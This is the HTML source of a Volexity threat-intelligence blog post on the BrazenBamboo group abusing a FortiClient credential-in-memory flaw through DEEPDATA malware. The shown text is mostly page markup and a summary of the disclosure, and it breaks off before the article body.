<!DOCTYPE html> <!--[if lt IE 7 ]> <html lang="en-US" class="ie ie6 lte9 lte8 lte7 lte6 no-js"> <![endif]--> <!--[if IE 7 ]> <html lang="en-US" class="ie ie7 lte9 lte8 lte7 no-js"> <![endif]--> <!--[if IE 8 ]> <html lang="en-US" class="ie ie8 lte9 lte8 no-js"> <![endif]--> <!--[if IE 9 ]> <html lang="en-US" class="ie ie9 lte9 no-js"> <![endif]--> <!--[if (gt IE 9)|!(IE)]><!--> <html lang="en-US" class="no-js"> <!--<![endif]--> <meta charset="UTF-8"> <title>BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA | Volexity</title> <meta name="HandheldFriendly" content="True"> <meta name="MobileOptimized" content="320"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="cleartype" content="on"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:site" content="@Volexity"> <meta name="twitter:creator" content="@Volexity"> <meta name="twitter:title" content="BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA"> <meta name="twitter:description" content="[Update: At the time of publication, this vulnerability had not been addressed by Fortinet. On December 18, 2024, Fortinet published a public acknowledgement of the issue, affected versions, as well as patching &amp; workaround advice.] KEY TAKEAWAYS Volexity discovered and reported a vulnerability in Fortinet&#039;s Windows VPN client, FortiClient, where user credentials remain in process memory after a user authenticates to the VPN. This vulnerability was abused by BrazenBamboo in their DEEPDATA malware. BrazenBamboo is the threat actor behind development of the LIGHTSPY malware family. LIGHTSPY variants have been discovered for all major operating systems, including iOS, and Volexity has recently discovered a new Windows variant. In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. [&hellip;]"> <meta name="twitter:image" content="https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png"> <link rel="apple-touch-icon" sizes="180x180" href="https://www.volexity.com/wp-content/themes/volexity/apple-touch-icon.png"> <link rel="icon" type="image/png" href="https://www.volexity.com/wp-content/themes/volexity/favicon-32x32.png" sizes="32x32"> <link rel="icon" type="image/png" href="https://www.volexity.com/wp-content/themes/volexity/favicon-16x16.png" sizes="16x16"> <link rel="icon" type="image/png" href="https://www.volexity.com/wp-content/themes/volexity/favicon.ico"> <link rel="manifest" href="https://www.volexity.com/wp-content/themes/volexity/manifest.json"> <meta name="theme-color" content="#12BEF0"> <meta property="og:image" content="https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA-300x157.png" /> <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-WRSX85NK29"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-WRSX85NK29'); </script> <meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /> <!-- This site is optimized with the Yoast SEO Premium plugin v22.5 (Yoast SEO v23.8) - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is a modular post-exploitation tool for the Windows operating system that is used to gather a wide range of information from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials from FortiClient VPN client process memory. On July 18, 2024, Volexity notified Fortinet about this vulnerability. At the time of writing, the issue remains unresolved." /> <link rel="canonical" href="https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="article" /> <meta property="og:title" content="BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA" /> <meta property="og:description" content="In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is a modular post-exploitation tool for the Windows operating system that is used to gather a wide range of information from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials from FortiClient VPN client process memory. On July 18, 2024, Volexity notified Fortinet about this vulnerability. At the time of writing, the issue remains unresolved." /> <meta property="og:url" content="https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/" /> <meta property="og:site_name" content="Volexity" /> <meta property="article:publisher" content="https://www.facebook.com/volexity/" /> <meta property="article:published_time" content="2024-11-15T19:50:18+00:00" /> <meta property="article:modified_time" content="2024-12-19T14:42:00+00:00" /> <meta property="og:image" content="https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png" /> <meta property="og:image:width" content="2061" /> <meta property="og:image:height" content="1078" /> <meta property="og:image:type" content="image/png" /> <meta name="author" content="Volexity" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Article","@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#article","isPartOf":{"@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/"},"author":{"name":"Volexity","@id":"https://www.volexity.com/#/schema/person/3159370c7fbbe719c11e41aeb6353ae1"},"headline":"BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA","datePublished":"2024-11-15T19:50:18+00:00","dateModified":"2024-12-19T14:42:00+00:00","mainEntityOfPage":{"@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/"},"wordCount":2988,"publisher":{"@id":"https://www.volexity.com/#organization"},"image":{"@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#primaryimage"},"thumbnailUrl":"https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png","keywords":["APT","brazenbamboo","China","exploits","forticlient","Fortinet","Threat Intelligence"],"articleSection":["Threat Intelligence"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/","url":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/","name":"BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA | Volexity","isPartOf":{"@id":"https://www.volexity.com/#website"},"primaryImageOfPage":{"@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#primaryimage"},"image":{"@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#primaryimage"},"thumbnailUrl":"https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png","datePublished":"2024-11-15T19:50:18+00:00","dateModified":"2024-12-19T14:42:00+00:00","description":"In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is a modular post-exploitation tool for the Windows operating system that is used to gather a wide range of information from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials from FortiClient VPN client process memory. On July 18, 2024, Volexity notified Fortinet about this vulnerability. At the time of writing, the issue remains unresolved.","breadcrumb":{"@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#primaryimage","url":"https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png","contentUrl":"https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png","width":2061,"height":1078,"caption":"Volexity Blog - BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA"},{"@type":"BreadcrumbList","@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.volexity.com/"},{"@type":"ListItem","position":2,"name":"Blog","item":"https://www.volexity.com/blog/"},{"@type":"ListItem","position":3,"name":"BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA"}]},{"@type":"WebSite","@id":"https://www.volexity.com/#website","url":"https://www.volexity.com/","name":"Volexity | Memory Forensics, Cybersecurity Threat Intelligence & Incident Response","description":"","publisher":{"@id":"https://www.volexity.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.volexity.com/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://www.volexity.com/#organization","name":"Volexity Inc.","alternateName":"Volexity - Forensic Memory Analysis","url":"https://www.volexity.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.volexity.com/#/schema/logo/image/","url":"https://www.volexity.com/wp-content/uploads/2018/01/Volexity-Logo-Full-Stacked-2019-1000px.jpg","contentUrl":"https://www.volexity.com/wp-content/uploads/2018/01/Volexity-Logo-Full-Stacked-2019-1000px.jpg","width":1000,"height":1000,"caption":"Volexity Inc."},"image":{"@id":"https://www.volexity.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/volexity/","https://x.com/Volexity","https://www.linkedin.com/company/volexity/","https://github.com/volexity","https://infosec.exchange/@volexity"]},{"@type":"Person","@id":"https://www.volexity.com/#/schema/person/3159370c7fbbe719c11e41aeb6353ae1","name":"Volexity","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.volexity.com/#/schema/person/image/","url":"https://secure.gravatar.com/avatar/757082c7e4105ce43a92a48f14f581c2?s=96&d=mm&r=g","contentUrl":"https://secure.gravatar.com/avatar/757082c7e4105ce43a92a48f14f581c2?s=96&d=mm&r=g","caption":"Volexity"}}]}</script> <!-- / Yoast SEO Premium plugin. --> <link rel='stylesheet' id='wp-block-library-css' href='https://www.volexity.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7' type='text/css' media='all' /> <style id='classic-theme-styles-inline-css' type='text/css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='cookie-notice-front-css' href='https://www.volexity.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=2.4.18' type='text/css' media='all' /> <link rel='stylesheet' id='main-style-css' href='https://www.volexity.com/wp-content/themes/volexity/dist/styles/styles.min.css?ver=6.7' type='text/css' media='screen, print' /> <script type="text/javascript" id="cookie-notice-front-js-before"> /* <![CDATA[ */ var cnArgs = {"ajaxUrl":"https:\/\/www.volexity.com\/wp-admin\/admin-ajax.php","nonce":"4459d1fad1","hideEffect":"fade","position":"bottom","onScroll":false,"onScrollOffset":100,"onClick":false,"cookieName":"cookie_notice_accepted","cookieTime":2592000,"cookieTimeRejected":2592000,"globalCookie":false,"redirection":false,"cache":false,"revokeCookies":false,"revokeCookiesOpt":"automatic"}; /* ]]> */ </script> <script type="text/javascript" src="https://www.volexity.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=2.4.18" id="cookie-notice-front-js"></script> <script type="text/javascript" src="https://www.volexity.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script type="text/javascript" src="https://www.volexity.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <link rel="https://api.w.org/" href="https://www.volexity.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://www.volexity.com/wp-json/wp/v2/posts/3346" /><link rel='shortlink' href='https://www.volexity.com/?p=3346' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://www.volexity.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.volexity.com%2Fblog%2F2024%2F11%2F15%2Fbrazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://www.volexity.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.volexity.com%2Fblog%2F2024%2F11%2F15%2Fbrazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata%2F&#038;format=xml" /> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. */ </style> <!--[if lte IE 9 ]> <script src="https://www.volexity.com/wp-content/themes/volexity/scripts/vendor/selectivizr.js"></script> <script src="https://www.volexity.com/wp-content/themes/volexity/scripts/vendor/respond.js"></script> <script src="https://www.volexity.com/wp-content/themes/volexity/scripts/vendor/mediamatch.js"></script> <![endif]--> </head> <body class="post-template-default single single-post postid-3346 single-format-standard cookies-not-set ie ie7 windows"> <header class="header"> <div class="header-top-container"> <div class="container"> <ul id="menu-sub-left" class="header-sub-left"><li id="menu-item-2116" class="icon-triangle menu-item menu-item-type-post_type menu-item-object-page menu-item-2116"><a href="https://www.volexity.com/company/contact/demo-request/" class="icon-triangle">Request A Demo</a></li> </ul> <ul id="menu-sub-right" class="header-sub-right"><li id="menu-item-1213" class="icon-warning menu-item menu-item-type-post_type menu-item-object-page menu-item-1213"><a href="https://www.volexity.com/company/contact/breach-assistance/" class="icon-warning">Breach Assistance</a></li> </ul> </div> </div> <div class="header-container"> <div class="container"> <a class="header-logo" href="https://www.volexity.com"><img src="https://www.volexity.com/wp-content/themes/volexity/dist/images/logo.png" alt="Volexity"></a> <div class="header-menu"> <ul id="menu-main-navigation" class="header-menu-list"><li id="menu-item-376" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-376"><a href="https://www.volexity.com/products-overview/">Products</a> <ul class="sub-menu"> <li id="menu-item-48" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-48"><a href="https://www.volexity.com/products-overview/">Products Overview</a></li> <li id="menu-item-50" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-50"><a href="https://www.volexity.com/products-overview/volcano/">Volcano</a></li> <li id="menu-item-49" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-49"><a href="https://www.volexity.com/products-overview/surge/">Surge</a></li> </ul> </li> <li id="menu-item-377" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-377"><a href="https://www.volexity.com/services-overview/">Services</a> <ul class="sub-menu"> <li id="menu-item-55" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55"><a href="https://www.volexity.com/services-overview/">Services Overview</a></li> <li id="menu-item-52" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-52"><a href="https://www.volexity.com/services-overview/incident-response/">Incident Response</a></li> <li id="menu-item-53" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-53"><a href="https://www.volexity.com/services-overview/network-security-monitoring/">Network Security Monitoring</a></li> <li id="menu-item-54" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54"><a href="https://www.volexity.com/services-overview/proactive-threat-assessments/">Proactive Threat Assessments</a></li> <li id="menu-item-56" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-56"><a href="https://www.volexity.com/services-overview/threat-intelligence/">Threat Intelligence</a></li> <li id="menu-item-2394" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2394"><a href="https://www.volexity.com/services-overview/mergers-acquisitions-cybersecurity-assessments/">M&#038;A Cybersecurity Assessments</a></li> </ul> </li> <li id="menu-item-385" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-385"><a href="https://www.volexity.com/company/about/">Company</a> <ul class="sub-menu"> <li id="menu-item-41" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41"><a href="https://www.volexity.com/company/about/">About</a></li> <li id="menu-item-43" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-43"><a href="https://www.volexity.com/company/news-press/">News &#038; Press</a></li> <li id="menu-item-1849" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1849"><a href="https://www.volexity.com/company/careers/">Careers</a></li> <li id="menu-item-1824" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1824"><a href="https://www.volexity.com/company/internships/">Internships</a></li> <li id="menu-item-1718" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1718"><a href="https://www.volexity.com/company/resources/">Resources</a></li> </ul> </li> <li id="menu-item-39" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-39"><a href="https://www.volexity.com/blog/">Blog</a></li> <li id="menu-item-45" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-45"><a href="https://www.volexity.com/company/contact/">Contact</a></li> </ul> </div> <div class="mobile-menu--holder"> <div class="mobile-menu"></div> </div> </div> </div> </header> <div class="int-header s5"> <div class="container"> <section class="int-header-hold col-sm-12"> blog </section> </div> </div> <main class="main"> <div class="container"> <section class="row int"> <article class="col-sm-8"> <div class="post-content composition"> <h2 class="post-title">BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA</h2> <p class="post-date">November 15, 2024</p> <p class="post-byline">by Callum Roxan, Charlie Gardner, Paul Rascagneres</p> <div class="post-single-social"> <a class="post-single-social-share" data-share-channel="facebook" data-title="BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA" data-description="[Update: At the time of publication, this vulnerability had not been addressed by Fortinet. On December 18, 2024, Fortinet published a public acknowledgement of the issue, affected versions, as well as patching &amp; workaround advice.] KEY TAKEAWAYS Volexity discovered and reported a vulnerability in Fortinet's Windows VPN client, FortiClient, where user credentials remain in process memory after a user authenticates to the VPN. This vulnerability was abused by BrazenBamboo in their DEEPDATA malware. BrazenBamboo is the threat actor behind development of the LIGHTSPY malware family. LIGHTSPY variants have been discovered for all major operating systems, including iOS, and Volexity has recently discovered a new Windows variant. In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. [&hellip;]" data-url="https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/" data-image="" data-caption="Volexity"><i class="icon icon-facebook-share"></i><span class="sr-only">Facebook</span></a> <a class="post-single-social-share" data-share-channel="twitter" data-text="BrazenBamboo+Weaponizes+FortiClient+Vulnerability+to+Steal+VPN+Credentials+via+DEEPDATA" data-url="https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/" data-hashtags="volexity" data-via="Volexity"><i class="icon icon-twitter-share"></i><span class="sr-only">Twitter</span></a> <a class="post-single-social-share" data-share-channel="email" data-post-id="3346"><i class="icon icon-mail-share"></i><span class="sr-only">Email</span></a> </div> <p><img fetchpriority="high" decoding="async" class="aligncenter size-full wp-image-3349" src="https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png" alt="" width="2061" height="1078" 